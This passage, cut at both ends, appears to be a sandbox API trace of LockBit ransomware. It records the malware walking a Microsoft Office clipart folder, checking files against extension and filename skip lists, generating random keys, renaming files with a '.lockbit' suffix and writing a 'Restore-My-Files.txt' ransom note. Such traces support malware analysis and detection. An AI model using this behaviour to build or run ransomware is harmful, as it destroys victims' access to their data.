ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3490, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107150.WMF", cAlternateFileName="")) returned 1 [0139.440] lstrcmpiW (lpString1=".", lpString2="J0107150.WMF") returned -1 [0139.440] lstrcmpiW (lpString1="..", lpString2="J0107150.WMF") returned -1 [0139.440] PathFindExtensionW (pszPath="J0107150.WMF") returned=".WMF" [0139.440] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.440] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.440] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.440] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.440] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.440] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.440] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.440] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.440] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.440] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.440] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.441] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.441] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107150.WMF") returned 1 [0139.442] lstrcmpiW (lpString1="ntldr", lpString2="J0107150.WMF") returned 1 [0139.442] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107150.WMF") returned 1 [0139.442] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107150.WMF") returned -1 [0139.442] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107150.WMF") returned -1 [0139.442] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107150.WMF") returned 1 [0139.442] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107150.WMF") returned -1 [0139.442] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.442] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned=".WMF" [0139.442] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.442] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.442] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.443] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.443] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF.lockbit") returned 72 [0139.443] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107150.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.444] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.444] malloc (_Size=0x40068) returned 0x3df0008 [0139.444] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13456) returned 1 [0139.444] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.445] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.445] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.449] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.449] malloc (_Size=0xa6) returned 0x77d7a8 [0139.449] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.470] free (_Block=0x77d7a8) [0139.470] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.470] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.470] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.470] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5804, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107152.WMF", cAlternateFileName="")) returned 1 [0139.470] lstrcmpiW (lpString1=".", lpString2="J0107152.WMF") returned -1 [0139.471] lstrcmpiW (lpString1="..", lpString2="J0107152.WMF") returned -1 [0139.471] PathFindExtensionW (pszPath="J0107152.WMF") returned=".WMF" [0139.471] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.471] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.471] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.471] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.471] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.471] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.471] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.471] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.471] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.472] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.473] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.473] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.473] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.473] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.473] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.474] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.475] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107152.WMF") returned 1 [0139.475] lstrcmpiW (lpString1="ntldr", lpString2="J0107152.WMF") returned 1 [0139.475] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107152.WMF") returned 1 [0139.475] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107152.WMF") returned -1 [0139.475] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107152.WMF") returned -1 [0139.475] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107152.WMF") returned 1 [0139.475] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107152.WMF") returned -1 [0139.475] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.475] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned=".WMF" [0139.475] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.475] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.475] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.476] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.476] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF.lockbit") returned 72 [0139.476] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107152.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.477] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.477] malloc (_Size=0x40068) returned 0x3df0008 [0139.477] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=22532) returned 1 [0139.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.478] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.478] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.557] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.557] malloc (_Size=0xa6) returned 0x77d7a8 [0139.557] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.561] free (_Block=0x77d7a8) [0139.561] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.561] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.561] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.561] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x571c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107154.WMF", cAlternateFileName="")) returned 1 [0139.561] lstrcmpiW (lpString1=".", lpString2="J0107154.WMF") returned -1 [0139.561] lstrcmpiW (lpString1="..", lpString2="J0107154.WMF") returned -1 [0139.561] PathFindExtensionW (pszPath="J0107154.WMF") returned=".WMF" [0139.561] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.561] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.562] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.562] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107154.WMF") returned 1 [0139.563] lstrcmpiW (lpString1="ntldr", lpString2="J0107154.WMF") returned 1 [0139.563] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107154.WMF") returned 1 [0139.563] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107154.WMF") returned -1 [0139.563] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107154.WMF") returned -1 [0139.563] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107154.WMF") returned 1 [0139.563] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107154.WMF") returned -1 [0139.563] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.563] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned=".WMF" [0139.563] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.563] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.563] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.564] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.564] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.564] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.564] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") 